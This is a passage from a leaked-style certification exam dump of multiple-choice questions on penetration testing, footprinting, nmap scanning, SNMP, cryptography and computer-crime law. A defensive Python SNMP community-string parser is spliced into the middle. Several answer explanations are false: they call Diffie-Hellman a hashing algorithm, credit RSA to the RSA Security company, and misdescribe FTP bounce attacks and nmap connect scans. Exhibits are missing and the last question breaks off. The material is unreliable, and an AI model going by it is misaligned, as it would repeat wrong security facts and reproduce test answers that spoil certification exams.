SHA-1 (as well as SHA-0) produces a 160-bit digest from a message with a maximum length of 2^64 - 1 bits, and is based on principles similar to those used by Professor Ronald L. Rivest of MIT in the design of the MD4 and MD5 message digest algorithms.
QUESTION 447:
_____ is a type of symmetric-key encryption algorithm that transforms a fixed-length block of plaintext (unencrypted text) data into a block of ciphertext (encrypted text) data of the same length.
A. Bit Cipher
B. Hash Cipher
C. Block Cipher
D. Stream Cipher
Answer: C
Explanation: A block cipher is a symmetric key cipher which operates on fixed-length groups of bits, termed blocks, with an unvarying transformation. When encrypting, a block cipher might take a (for example) 128-bit block of plaintext as input, and output a corresponding 128-bit block of ciphertext.
QUESTION 448:
There is some dispute between two network administrators at your company. Your boss asks you to come and meet with the administrators to set the record straight.
Which of these are true about PKI and encryption?
Select the best answers.
A. PKI provides data with encryption, compression, and restorability.
B. Public-key encryption was invented in 1976 by Whitfield Diffie and Martin Hellman.
C. When it comes to eCommerce, as long as you have authenticity, and authenticity, you do not need encryption.
D. RSA is a type of encryption.
Answer: B, D
Explanation:
PKI provides confidentiality, integrity, and authenticity of the messages exchanged between these two types of systems. The 3rd party provides the public key and the receiver verifies the message with a combination of the private and public key.
Public-key encryption WAS invented in 1976 by Whitfield Diffie and Martin Hellman. The famous hashing algorithm Diffie-Hellman was named after them. The RSA Algorithm was created by the RSA Security company, which has also created other widely used encryption algorithms.
QUESTION 449:
Joel and her team have been going through tons of garbage, recycled paper, and other rubbish in order to find some information about the target they are attempting to penetrate.
What would you call this kind of activity?
A. CI Gathering
B. Scanning
C. Dumpster Diving
D. Garbage Scooping
Answer: C
QUESTION 450:
A client has approached you with penetration test requirements. They are concerned with the possibility of external threat, and have invested considerable resources in protecting their Internet exposure. However, their main concern is the possibility of an employee elevating his/her privileges and gaining access to information outside of their respective department.
What kind of penetration test would you recommend that would best address the client's concern?
A. A Black Box test
B. A Black Hat test
C. A Grey Box test
D. A Grey Hat test
E. A White Box test
F. A White Hat test
Answer: C
QUESTION 451:
Which of the following should be performed first in any penetration test?
A. System identification
B. Intrusion Detection System testing
C. Passive information gathering
D. Firewall testing
Answer: C
QUESTION 452:
Vulnerability mapping occurs after which phase of a penetration test?
A. Host scanning
B. Passive information gathering
C. Analysis of host scanning
D. Network level discovery
Answer: C
Explanation:
The order should be Passive information gathering, Network level discovery, Host scanning and Analysis of host scanning.
QUESTION 453:
Why would you consider sending an email to an address that you know does not exist within the company you are performing a Penetration Test for?
A. To determine who is the holder of the root account
B. To perform a DoS
C. To create needless SPAM
D. To elicit a response back that will reveal information about email servers and how they treat undeliverable mail
E. To test for virus protection
Answer: D
Explanation: Sending a bogus email is one way to find out more about internal servers. Also, to gather additional IP addresses and learn how they treat mail.
QUESTION 454:
Which type of attack is port scanning?
A. Web server attack
B. Information gathering
C. Unauthorized access
D. Denial of service attack
Answer: B
QUESTION 455:
DRAG DROP
A successful attack by a malicious hacker can be divided into five phases.
Match the order:
Answer:

Explanation:
* Reconnaissance refers to the preparatory phase where an attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack.
* In the second phase the hacker starts to scan the remote host to gather information about the OS in use, open ports, etc.
* After gathering information about the remote host, the hacker starts to gain access to it.
QUESTION 456:
Oregon Corp is fighting a litigation suit with Scamster Inc. Oregon has assigned a private investigative agency to go through garbage, recycled paper, and other rubbish at Scamster's office site in order to find relevant information. What would you call this kind of activity?
A. Garbage Scooping
B. Dumpster Diving
C. Scanning
D. CI Gathering
Answer: B
Explanation: Dumpster diving is the colloquial name for going through somebody's garbage -- which will usually be in dumpsters for large organizations. This is a powerful tactic because it is protected by social taboos. Trash is bad, and once it goes into the trash, something is best forgotten. The reality is that most company trash is fairly clean, and provides a gold mine of information.
QUESTION 457:
Which definition below best describes a covert channel?
A. Making use of a Protocol in a way it was not intended to be used
B. It is the multiplexing taking place on communication link
C. It is one of the weak channels used by WEP that makes it insecure
D. A Server Program using a port that is not well known
Answer: A
Explanation: A covert channel is a hidden communication channel not intended for information transfer at all. Redundancy can often be used to communicate in a covert way. There are several ways that hidden communication can be set up.
QUESTION 458:
Peter has been monitoring his IDS and sees that there are a huge number of ICMP Echo Reply packets that are being received on the External Gateway interface. Further inspection reveals they are not responses to internal hosts' requests but simply responses coming from the Internet. What could be the likely cause of this?
A. Someone Spoofed Peter's IP Address while doing a land attack
B. Someone Spoofed Peter's IP Address while doing a DoS attack
C. Someone Spoofed Peter's IP Address while doing a smurf Attack
D. Someone Spoofed Peter's IP address while doing a fraggle attack
Answer: C
QUESTION 459:
The United Kingdom (UK) has passed a law that makes hacking into an unauthorized network a felony.
The law states:
Section1 of the Act refers to unauthorized access to computer material. This states that a person commits an offence if he causes a computer to perform any function with intent to secure unauthorized access to any program or data held in any computer.
For a successful conviction under this part of the Act, the prosecution must prove that the access secured is unauthorized and that the suspect knew that this was the case. This section is designed to deal with common-or-garden hacking.
Section 2 of the Act deals with unauthorized access with intent to commit or facilitate the commission of further offences. An offence is committed under Section 2 if a Section 1 offence has been committed and there is the intention of committing or facilitating a further offence (any offence which attracts a custodial sentence of more than five years, not necessarily one covered by the Act). Even if it is not possible to prove the intent to commit the further offence, the Section 1 offence is still committed.
Section 3 offences cover unauthorized modification of computer material, which generally means the creation and distribution of viruses. For conviction to succeed there must have been the intent to cause the modifications and knowledge that the modification had not been authorized.
What is the law called?
A. Computer Misuse Act 1990
B. Computer incident Act 2000
C. Cyber Crime Law Act 2003
D. Cyber Space Crime Act 1995
Answer: A
Explanation: Computer Misuse Act (1990) creates three criminal offences:
1. Unauthorised access to computer material
2. Unauthorised access to a computer system with intent to commit or facilitate the commission of a further offence
3. Unauthorised modification of computer material
QUESTION 460:
Which of the following best describes Vulnerability?
A. The loss potential of a threat
B. An action or event that might prejudice security
C. An agent that could take advantage of a weakness
D. A weakness or error that can lead to compromise
Answer: D
Explanation: A vulnerability is a flaw or weakness in system security procedures, design or implementation that could be exercised (accidentally triggered or intentionally exploited) and result in a harm to an IT system or activity.
QUESTION 461:
Steven works as a security consultant and frequently performs penetration tests for Fortune 500 companies. Steven runs external and internal tests and then creates reports to show the companies where their weak areas are. Steven always signs a non-disclosure agreement before performing his tests. What would Steven be considered?
A. Whitehat Hacker
B. BlackHat Hacker
C. Grayhat Hacker
D. Bluehat Hacker
Answer: A
Explanation: A white hat hacker, also rendered as ethical hacker, is, in the realm of information technology, a person who is ethically opposed to the abuse of computer systems. Realization that the Internet now represents human voices from around the world has made the defense of its integrity an important pastime for many. A white hat generally focuses on securing IT systems, whereas a black hat (the opposite) would like to break into them.
QUESTION 462:
Which of the following acts in the United States specifically criminalizes the transmission of unsolicited commercial e-mail (SPAM) without an existing business relationship?
A. 2004 CANSPAM Act
B. 2003 SPAM Preventing Act
C. 2005 US-SPAM 1030 Act
D. 1990 Computer Misuse Act
Answer: A
Explanation: The CAN-SPAM Act of 2003 (Controlling the Assault of Non-Solicited Pornography and Marketing Act) establishes requirements for those who send commercial email, spells out penalties for spammers and companies whose products are advertised in spam if they violate the law, and gives consumers the right to ask emailers to stop spamming them. The law, which became effective January 1, 2004, covers email whose primary purpose is advertising or promoting a commercial product or service, including content on a Web site. A "transactional or relationship message" - email that facilitates an agreed-upon transaction or updates a customer in an existing business relationship - may not contain false or misleading routing information, but otherwise is exempt from most provisions of the CAN-SPAM Act.
QUESTION 463:
Certkiller.com is legally liable for the content of email that is sent from its systems, regardless of whether the message was sent for a private or business-related purpose.
This could lead to prosecution for the sender and for the company's directors if, for example, outgoing email was found to contain material that was pornographic, racist or likely to incite someone to commit an act of terrorism.
You can always defend yourself with an "ignorance of the law" clause.
A. True
B. False
Answer: B
Explanation: Ignorantia juris non excusat or Ignorantia legis neminem excusat (Latin for "ignorance of the law does not excuse" or "ignorance of the law excuses no one") is a public policy holding that a person who is unaware of a law may not escape liability for violating that law merely because he or she was unaware of its content; that is, persons have presumed knowledge of the law. Presumed knowledge of the law is the principle in jurisprudence that one is bound by a law even if one does not know of it. It has also been defined as the "prohibition of ignorance of the law".
QUESTION 464:
Terrorist organizations are increasingly blocking all traffic from North America or from Internet Protocol addresses that point to users who rely on the English language.
Hackers sometimes set a number of criteria for accessing their website. This information is shared among the co-hackers. For example, if you are using a machine with the Linux operating system and the Netscape browser, then you will have access to their website in a covert way. When federal investigators using PCs running Windows and Internet Explorer visited the hackers' shared site, the hackers' system immediately mounted a distributed denial-of-service attack against the federal system.
Companies today are engaging in tracking competitors through reverse IP address lookup sites like whois.com, which provide an IP address's domain. When the competitor visits the company's website they are directed to a products page without discounts, and prices are marked higher for their product. When normal users visit the website they are directed to a page with full-blown product details along with attractive discounts. This is based on IP-based blocking, where certain addresses are barred from accessing a site.
What is this masking technique called?
A. Website Cloaking
B. Website Filtering
C. IP Access Blockade
D. Mirrored WebSite
Answer: A
Explanation: Website Cloaking travels under a variety of aliases including Stealth, Stealth scripts, IP delivery, Food Script, and Phantom page technology. It is popular due to its ability to manipulate those elusive top-ranking results from spider search engines.
QUESTION 465:
Bill has started to notice some slowness on his network when trying to update his company's website and when trying to access the website from the Internet. Bill asks the help desk manager if he has received any calls about slowness from the end users, but the help desk manager says that he has not. Bill receives a number of calls from customers who can't access the company website and can't purchase anything online. Bill logs on to a couple of his routers and notices that the logs show network traffic at an all-time high. He also notices that almost all the traffic is originating from a specific address.
Bill decides to use Geotrace to find out where the suspect IP originates from. The Geotrace utility runs a traceroute and finds that the IP is coming from Panama. Bill knows that none of his customers are in Panama, so he immediately thinks that his company is under a Denial of Service attack. Now Bill needs to find out more about the originating IP address.
What Internet registry should Bill look in to find the IP Address?
A. LACNIC
B. ARIN
C. RIPELACNIC
D. APNIC
Answer: A
Explanation: LACNIC is the Latin American and Caribbean Internet Addresses Registry that administers IP addresses, autonomous system numbers, reverse DNS, and other network resources for that region.
QUESTION 466:
System Administrators sometimes post questions to newsgroups when they run into technical challenges. As an ethical hacker, you could use the information in newsgroup postings to glean insight into the makeup of a target network. How would you search for these postings using Google search?
A. Search in Google using the key strings "the target company" and "newsgroups"
B. Search for the target company name at http://groups.google.com
C. Use NNTP websites to search for these postings
D. Search in Google using the key search strings "the target company" and "forums"
Answer: B
Explanation: Using http://groups.google.com is the easiest way to access various newsgroups today. Before http://groups.google.com you had to use special NNTP clients or subscribe to some NNTP-to-web services.
QUESTION 467:
Which of the following activities would not be considered passive footprinting?
A. Search on financial site such as Yahoo Financial
B. Perform multiple queries through a search engine
C. Scan the range of IP addresses found in their DNS database
D. Go through the rubbish to find out any information that might have been discarded
Answer: C
Explanation: Passive footprinting is a method in which the attacker never makes contact with the target. Scanning the target's IP addresses can be logged at the target, and therefore contact has been made.
QUESTION 468:

You are footprinting the www.xsecurity.com domain using the Google Search Engine. You would like to determine what sites link to www.xsecurity.com at the first level of relevance.
Which of the following operators in Google search will you use to achieve this?
A. Link: www.xsecurity.com
B. serch?l:www.xsecurity.com
C. level1.www.security.com
D. pagerank:www.xsecurity.com
Answer: A
Explanation: The query [link:] will list webpages that have links to the specified webpage. For instance, [link:www.google.com] will list webpages that have links pointing to the Google homepage. Note there can be no space between the "link:" and the web page URL.
QUESTION 469:
While doing a fast scan using the -F option, which file does nmap use to list the range of ports to scan?
A. services
B. nmap-services
C. protocols
D. ports
Answer: B
Explanation: Nmap uses the nmap-services file to provide additional port detail for almost every scanning method. Every time a port is referenced, it's compared to an available description in this support file. If the nmap-services file isn't available, nmap reverts to the /etc/services file applicable for the current operating system.
QUESTION 470:
Bob, a Junior Administrator at Certkiller.com, is searching for the port number of POP3 in a file. The partial output of the file looks like:
Which file is he searching?
A. services
B. protocols
C. hosts
D. resolve.conf
Answer: A
Explanation: The port numbers on which certain standard services are offered are defined in RFC 1700, Assigned Numbers. The /etc/services file enables server and client programs to convert service names to these numbers (ports). The list is kept on each host and is stored in the file /etc/services.
QUESTION 471:
Exhibit:

Please study the exhibit carefully.
Which protocol maintains the communication in this way?
A. UDP
B. IP
C. TCP
D. ARP
E. RARP
Answer: C
Explanation: A TCP connection is always initiated with the 3-way handshake, which establishes and negotiates the actual connection over which data will be sent.
QUESTION 472:
What are the four steps used by nmap scanning?
A. DNS Lookup
B. ICMP Message
C. Ping
D. Reverse DNS lookup
E. TCP three way handshake
F. The Actual nmap scan
Answer: A,C,D,F
Explanation: Nmap performs four steps during a normal device scan. Some of these steps can be modified or disabled using options on the nmap command line.
1. If a hostname is used as a remote device specification, nmap will perform a DNS lookup prior to the scan.
2. Nmap pings the remote device. This refers to the nmap "ping" process, not (necessarily) a traditional ICMP echo request.
3. If an IP address is specified as the remote device, nmap will perform a reverse DNS lookup in an effort to identify a name that might be associated with the IP address. This is the opposite process of what happens in step 1, where an IP address is found from a hostname specification.
4. Nmap executes the scan. Once the scan is over, this four-step process is completed.
Except for the actual scan process in step four, each of these steps can be disabled or prevented using different IP addressing or nmap options. The nmap process can be as "quiet" or as "loud" as necessary!
QUESTION 473:
You are trying to scan a machine on ABC company's LAN named mail.abc.com. That machine is actually located behind the firewall. Which port does nmap send the TCP synchronize frame to on mail.abc.com?
A. 443
B. 80
C. 8080
D. 23
Answer: A

QUESTION 474:
Jenny, a well-known hacker, is scanning the remote host 204.4.4.4 using nmap. She gets the scan output but sees that the state of port 25 is filtered. What is the meaning of the filtered port state?
A. Can Accessible
B. Filtered by firewall
C. Closed
D. None of above
Answer: B
Explanation:
The state is either open, filtered, closed, or unfiltered. Filtered means that a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed.
QUESTION 475:
You want to find the live machines on the LAN. What type of scan should you use?
A. Connect
B. SYN
C. TCP
D. UDP
E. PING
Answer: E
Explanation: The ping scan is one of the quickest scans that nmap performs, since no actual ports are queried. Unlike a port scan where thousands of packets are transferred between two stations, a ping scan requires only two frames. This scan is useful for locating active devices or determining if ICMP is passing through a firewall.
QUESTION 476:
Which FTP transfer mode is required for FTP bounce attack?
A. Active Mode
B. Passive Mode
C. User Mode
D. Anonymous Mode
Answer: B
Explanation: An FTP bounce attack needs the server to support passive connections, and the client program needs to use the PORT command instead of the PASV command.
QUESTION 477:
Nathalie would like to perform a reliable scan against a remote target. She is not concerned about being stealthy at this point. Which of the following types of scan would be the most accurate and reliable?
A. A FIN Scan
B. A Half Scan
C. A UDP Scan
D. The TCP Connect Scan
Answer: D
Explanation: The connect() system call provided by your operating system is used to open a connection to every interesting port on the machine. If the port is listening, connect() will succeed, otherwise the port isn't reachable. One strong advantage to this technique is that you don't need any special privileges. This is the fastest scanning method supported by nmap, and is available with the -t (TCP) option. The big downside is that this sort of scan is easily detectable and filterable.
QUESTION 478:
John has performed a scan of the web server with NMAP but did not gather enough information to accurately identify which operating system is running on the remote host. How could you use a web server to help in identifying the OS that is being used?
A. Telnet to an open port and grab the banner
B. Connect to the web server with an FTP client
C. Connect to the web server with a browser and look at the web page
D. Telnet to port 8080 on the web server and look at the default page code
Answer: A
Explanation: Most Web servers politely identify themselves and the OS to anyone who asks.
QUESTION 479:
Mark works as a contractor for the Department of Defense and is in charge of network security. He has spent the last month securing access to his network from all possible entry points. He has segmented his network into several subnets and has installed firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out except ports that must be used. He does need to have port 80 open since his company hosts a website that must be accessed from the Internet. Mark is fairly confident of his perimeter defense, but is still worried about programs like Hping2 that can get into a network through covert channels. How should Mark protect his network from an attacker using Hping2 to scan his internal network?
A. Blocking ICMP type 13 messages
B. Block All Incoming traffic on port 53
C. Block All outgoing traffic on port 53
D. Use stateful inspection on the firewalls
Answer: A
Explanation: An ICMP type 13 message is an ICMP timestamp request, which waits for an ICMP timestamp reply. The remote node may answer, but it is not required to, as the message is optional and thus many IP stacks ignore such packets. Nevertheless, nmap again manages to make its packets distinctive by setting the originating timestamp field in the packet to 0.
QUESTION 480:
Lori has just been tasked by her supervisor to conduct a vulnerability scan on the corporate network. She has been instructed to perform a very thorough test of the network to ensure that there are no security holes on any of the machines. Lori's company does not own any commercial scanning products, so she decides to download a free one off the Internet. Lori has never done a vulnerability scan before, so she is unsure of some of the settings available in the software she downloaded. One of the options is to choose which ports can be scanned. Lori wants to do exactly what her boss has told her, but she does not know which ports should be scanned.
If Lori is supposed to scan all known TCP ports, how many ports should she select in the software?
A. 65536
B. 1024
C. 1025
D. Lori should not scan TCP ports, only UDP ports
Answer: A
Explanation: In both TCP and UDP, each packet header will specify a source port and a destination port, each of which is a 16-bit unsigned integer (i.e. ranging from 0 to 65535).
QUESTION 481:
Samantha has been actively scanning the client network for which she is doing a vulnerability assessment test. While doing a port scan she notices ports open in the 135 to 139 range. What protocol is most likely to be listening on those ports?
A. SMB
B. FTP
C. SAMBA
D. FINGER
Answer: A
Explanation: Port 135 is for RPC and 136-139 is for NetBIOS traffic. SMB is an upper layer service that runs on top of the Session Service and the Datagram service of NetBIOS.
QUESTION 482:
Paula works as the primary help desk contact for her company. Paula has just received a call from a user reporting that his computer just displayed a Blue Screen of Death screen and he can no longer work. Paula walks over to the user's computer and sees the Blue Screen of Death screen. The user's computer is running Windows XP, but the Blue Screen looks like a familiar one that Paula had seen on Windows 2000 computers periodically.
The user said he stepped away from his computer for only 15 minutes and when he got back, the Blue Screen was there. Paula also noticed that the hard drive activity light was flashing, meaning that the computer was processing something. Paula knew this should not be the case since the computer should be completely frozen during a Blue Screen. She checks the network IDS live log entries and notices numerous nmap scan alerts.
What is Paula seeing happen on this computer?
A. Paula's Network was scanned using FloppyScan
B. Paula's Network was scanned using Dumpsec
C. There was IRQ conflict in Paula's PC
D. Tool like Nessus will cause BSOD
Answer: A
Explanation: Floppyscan is a dangerous hacking tool which can be used to portscan a system using a floppy disk. It boots up a mini Linux, displays a Blue Screen of Death screen, port scans the network using NMAP and sends the results by e-mail to a remote server.
QUESTION 483:
You are scanning the target network for the first time. You are able to detect a few conventional open ports. While attempting to perform conventional service identification by connecting to the open ports, the scan yields either bad or no results. As you are unsure of the protocols in use, you want to discover as many different protocols as possible. Which of the following scan options can help you achieve this?
A. Nessus scan with TCP based pings
B. Netcat scan with the switches
C. Nmap scan with the P (ping scan) switch
D. Nmap with the O (Raw IP Packets) switch
Answer: D
Explanation:
-sO IP protocol scans: This method is used to determine which IP protocols are supported on a host. The technique is to send raw IP packets without any further protocol header to each specified protocol on the target machine. If we receive an ICMP protocol unreachable message, then the protocol is not in use. Otherwise we assume it is open. Note that some hosts (AIX, HP-UX, Digital UNIX) and firewalls may not send protocol unreachable messages.
QUESTION 484:
Jack is conducting a port scan of a target network. He knows that his target network has a web server and that a mail server is up and running. Jack has been sweeping the network but has not been able to get any responses from the remote target. Check all of the following that could be a likely cause of the lack of response?
A. The host might be down
B. UDP is filtered by a gateway
C. ICMP is filtered by a gateway
D. The TCP window Size does not match
E. The destination network might be down
F. The packet TTL value is too low and can't reach the target
Answer: A,C,E,F
Explanation: The wrong answers are B and D, as sweeping a network uses ICMP.
QUESTION 485:
War dialing is one of the oldest methods of gaining unauthorized access to target systems; it is one of the dangers most commonly forgotten by network engineers and system administrators. A hacker can sneak past all the expensive firewalls and IDS and connect easily into the network. Through wardialing an attacker searches for the devices located in the target network infrastructure that are also accessible through the telephone line.
'Dial backup' in routers is most frequently found in networks where redundancy is required. Dial-on-demand routing (DDR) is commonly used to establish connectivity as a backup.
As a security tester, how would you discover what telephone numbers to dial in to the router?
A. Search the Internet for leakage for target company's telephone number to dial-in
B. Run a war-dialing tool with a range of phone numbers and look for a CONNECT response
C. Connect using ISP's remote-dial in number since the company's router has a leased line connection established with them
D. Brute force the company's PABX system to retrieve the range of telephone numbers to dial-in
Answer: B
Explanation: Use a program like Toneloc to scan the company's range of phone numbers.
QUESTION 486:
The FIN flag is set and sent from host A to host B when host A has no more data to transmit (Closing a TCP connection). This flag releases the connection resources.
However, host A can continue to receive data as long as the SYN sequence number of transmitted packets from host B are lower than the packet segment containing the set FIN flag.
A. True
B. False
Answer: A
Explanation: For sequence number purposes, the SYN is considered to occur before the first actual data octet of the segment in which it occurs, while the FIN is considered to occur after the last actual data octet in a segment in which it occurs.
So packets received out of order will still be accepted.

QUESTION 487:
Which type of scan does not open a full TCP connection?
A. Stealth Scan
B. XMAS Scan
C. Null Scan
D. FIN Scan
Answer: A
Explanation: Stealth Scan: Instead of completing the full TCP three-way handshake, a full connection is not made. A SYN packet is sent to the system and if a SYN/ACK packet is received it is assumed that the port on the system is active. In that case a RST/ACK will be sent, which will determine the listening state the system is in. If a RST/ACK packet is received, it is assumed that the port on the system is not active.
QUESTION 488:
Gerald, the systems administrator for Hyped Enterprise, has just discovered that his network has been breached by an outside attacker. After performing routine maintenance on his servers, he discovers numerous remote tools were installed that no one in his department claims to have knowledge of.
Gerald logs onto the management console for his IDS and discovers an unknown IP address that scanned his network constantly for a week and was able to access his network through a high-level port that was not closed. Gerald traces the IP address he found in the IDS log to proxy server in Brazil.
Gerald calls the company that owns the proxy server and after searching through their logs, they trace the source to another proxy server in Switzerland. Gerald calls the company in Switzerland that owns the proxy server and after scanning through the logs again, they trace the source back to a proxy server in China.
What tool did Gerald's attacker use to cover their tracks?
A. Tor
B. ISA
C. IAS
D. Cheops
Answer: A
Explanation: Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs).
QUESTION 489:
Which of the following is a patch management utility that scans one or more computers on your network and alerts you if important Microsoft Security patches are missing? It then provides links that enable those missing patches to be downloaded and installed.
A. MBSA
B. BSSA
C. ASNB
D. PMUS
Answer: A
Explanation: The Microsoft Baseline Security Analyzer (MBSA) is a tool put out by Microsoft to help analyze security problems in Microsoft Windows. It does this by scanning the system for security problems in Windows, Windows components such as the IIS web server application, Microsoft SQL Server, and Microsoft Office. One example of an issue might be that permissions for one of the directories in the wwwroot folder of IIS could be set at too low a level, allowing unwanted modification of files from outsiders.
QUESTION 490:
You are conducting an idlescan manually using HPING2. During the scanning process, you notice that almost every query increments the IPID, regardless of the port being queried. One or two of the queries cause the IPID to increment by more than one value. Which of the following options would be a possible reason?
A. Hping2 can't be used for idlescanning
B. The Zombie you are using is not truly idle
C. These ports are actually open on the target system
D. A stateful inspection firewall is resetting your queries
Answer: B
Explanation: If the IPID increments more than one value that means that there has been network traffic between the queries so the zombie is not idle.
QUESTION 491:
While reviewing the results of a scan run against a target network you come across the following:

What was used to obtain this output?
A. An SNMP Walk
B. Hping2 diagnosis
C. A Bo2K System query
D. Nmap protocol/port scan
Answer: A
Explanation: The snmpwalk command is designed to perform a sequence of chained GETNEXT requests automatically, rather than having to issue the necessary snmpgetnext requests by hand. The command takes a single OID, and will display a list of all the results which lie within the subtree rooted on this OID.
QUESTION 492:

Which of the following nmap commands in Linux produces the above output?
A. sudo nmap -sP 192.168.0.1/24
B. root nmap -sA 192.168.0.1/24
C. run nmap -TX 192.168.0.1/24
D. launch nmap -PP 192.168.0.1/24
Answer: A
Explanation: This is an output from a ping scan. The option -sP will give you a ping scan of the 192.168.0.1/24 network.
QUESTION 493:
SNMP is a protocol used to query hosts, servers and devices about performance or health status data. Hackers have used this protocol for a long time to gather a great amount of information about remote hosts. Which of the following features makes this possible?
A. It is susceptible to sniffing
B. It uses TCP as the underlying protocol
C. It is used by ALL devices on the market
D. It uses a community string sent as clear text
Answer: A,D
Explanation: SNMP uses UDP, not TCP, and even though many devices use SNMP, not ALL devices use it, and it can be disabled on most of the devices that do use it. However, SNMP is susceptible to sniffing and the community string (which can be said to act as a password) is sent in clear text.
QUESTION 494:
Jonathan being a keen administrator has followed all of the best practices he could find on securing his Windows Server. He renamed the Administrator account to a new name that can't be easily guessed but there remain people who attempt to compromise his newly renamed administrator account. How can a remote attacker decipher the name of the administrator account if it has been renamed?
A. The attacker guessed the new name
B. The attacker used the user2sid program
C. The attacker used the sid2user program
D. The attacker used NMAP with the V option
Answer: C
Explanation: User2sid.exe can retrieve a SID from the SAM (Security Accounts Manager) of the local or a remote machine. Sid2user.exe can then be used to retrieve the names of all the user accounts and more. These utilities do not exploit a bug but call the functions LookupAccountName and LookupAccountSid respectively. What is more, these can be called against a remote machine without providing logon credentials save those needed for a null session connection.
QUESTION 495:
SNMP is a connectionless protocol that uses UDP instead of TCP packets. (True or False)
A. True
B. False
Answer: A
Explanation: TCP and UDP both provide transport services, but UDP was preferred. This is due to TCP's characteristics: it is a complicated protocol and it consumes too many memory and CPU resources, whereas UDP is easy to build and run. Into devices such as repeaters and modems, vendors have built simple versions of IP and UDP.
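Questions 493 and 495 both turn on the same point: SNMPv1/v2c runs over UDP and carries its community string in clear text, so anyone who can sniff the segment can read it. As an added example that is not part of the original dump, this Python walks the BER header of an SNMP datagram and reports what a passive observer learns; the GetRequest bytes below are constructed for this example (a request for sysDescr.0 with community "public"), not captured traffic.

```python
# Minimal BER walk over an SNMP message header: enough to show that SNMPv1/v2c
# carry the community string as a plain OCTET STRING right after the version.
# Constructed datagram: SNMPv1 GetRequest for sysDescr.0 (1.3.6.1.2.1.1.1.0).
SNMPV1_GET = bytes.fromhex(
    "3026"                      # SEQUENCE, 38 bytes of content
    "020100"                    # INTEGER version = 0 (SNMPv1)
    "04067075626c6963"          # OCTET STRING "public"  <- cleartext community
    "a019"                      # GetRequest-PDU, 25 bytes
    "020101" "020100" "020100"  # request-id 1, error-status 0, error-index 0
    "300e" "300c"               # VarBindList, first VarBind
    "06082b06010201010100"      # OID 1.3.6.1.2.1.1.1.0
    "0500"                      # NULL value (nothing requested yet)
)
# Constructed SNMPv3 prefix: after version 3 comes msgGlobalData, not a community.
SNMPV3_HEADER = bytes.fromhex("3003020103")

VERSION_NAMES = {0: "v1", 1: "v2c", 3: "v3"}
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA4: "Trap"}
DEFAULT_COMMUNITIES = {"public", "private"}   # vendor defaults worth flagging


def read_tlv(buf, pos):
    """Decode one BER tag-length-value at buf[pos]; return (tag, value, next_pos)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                        # long form: low 7 bits = count of length octets
        n = length & 0x7F
        if n == 0 or pos + n > len(buf):
            raise ValueError("bad long-form length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("TLV value runs past end of buffer")
    return tag, buf[pos:pos + length], pos + length


def decode_oid(raw):
    """Decode a BER OID (first byte packs two arcs, rest are base-128) to dotted form."""
    arcs = [raw[0] // 40, raw[0] % 40]
    value = 0
    for b in raw[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:                     # high bit clear ends the subidentifier
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


def parse_snmp_header(datagram):
    """Return version, community (None for v3), PDU type and the first requested OID."""
    tag, msg, _ = read_tlv(datagram, 0)
    if tag != 0x30:
        raise ValueError("SNMP message must start with a SEQUENCE")
    tag, ver, pos = read_tlv(msg, 0)
    if tag != 0x02:
        raise ValueError("expected INTEGER version")
    version = VERSION_NAMES.get(int.from_bytes(ver, "big"), "unknown")
    if version == "v3":                      # v3 authenticates via USM; no community field
        return {"version": version, "community": None, "pdu": None, "oid": None}
    tag, community, pos = read_tlv(msg, pos)
    if tag != 0x04:
        raise ValueError("expected OCTET STRING community")
    pdu_tag, pdu, _ = read_tlv(msg, pos)
    oid = None
    if pdu_tag in (0xA0, 0xA1, 0xA2, 0xA3):  # Trap PDUs have a different layout; skip them
        p = 0
        for _ in range(3):                   # request-id, error-status, error-index
            _, _, p = read_tlv(pdu, p)
        _, varbinds, _ = read_tlv(pdu, p)
        _, varbind, _ = read_tlv(varbinds, 0)
        oid_tag, oid_raw, _ = read_tlv(varbind, 0)
        if oid_tag == 0x06 and oid_raw:
            oid = decode_oid(oid_raw)
    return {"version": version, "community": community.decode("ascii", "replace"),
            "pdu": PDU_NAMES.get(pdu_tag, hex(pdu_tag)), "oid": oid}


def audit_datagram(datagram):
    """What a sniffer learns from one datagram, plus whether the community is a vendor default."""
    info = parse_snmp_header(datagram)
    info["cleartext_community"] = info["community"] is not None
    info["default_community"] = info["community"] in DEFAULT_COMMUNITIES
    return info


if __name__ == "__main__":
    for name, dgram in (("SNMPv1 GetRequest", SNMPV1_GET), ("SNMPv3 header", SNMPV3_HEADER)):
        print(name, audit_datagram(dgram))
```

Run against a real capture, the same walk is what lets a network IDS raise an alert on default community strings crossing an untrusted segment.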
QUESTION 496:

Maurine is working as a security consultant for Hinklemeir Associate. She has asked the Systems Administrator to create a group policy that would not allow null sessions on the network. The Systems Administrator is fresh out of college and has never heard of null sessions and does not know what they are used for. Maurine is trying to explain to the Systems Administrator that hackers will try to create a null session when footprinting the network.
Why would an attacker try to create a null session with a computer on a network?
A. Enumerate users shares
B. Install a backdoor for later attacks
C. Escalate his/her privileges on the target server
D. To create a user with administrative privileges for later use
Answer: A
Explanation: The Null Session is often referred to as the "Holy Grail" of Windows hacking. Listed as the number 5 Windows vulnerability on the SANS/FBI Top 20 list, Null Sessions take advantage of flaws in the CIFS/SMB (Common Internet File System/Server Message Block) architecture. You can establish a Null Session with a Windows (NT/2000/XP) host by logging on with a null user name and password.
Using these null connections allows you to gather the following information from the host:
- List of users and groups
- List of machines
- List of shares
- Users and host SIDs (Security Identifiers)
QUESTION 497:
Samuel is the network administrator of DataX Communications Inc. He is trying to configure his firewall to block password brute-force attempts on his network. He enables blocking of the intruder's IP address for a period of 24 hours after more than three unsuccessful attempts. He is confident that this rule will secure his network from hackers on the Internet.
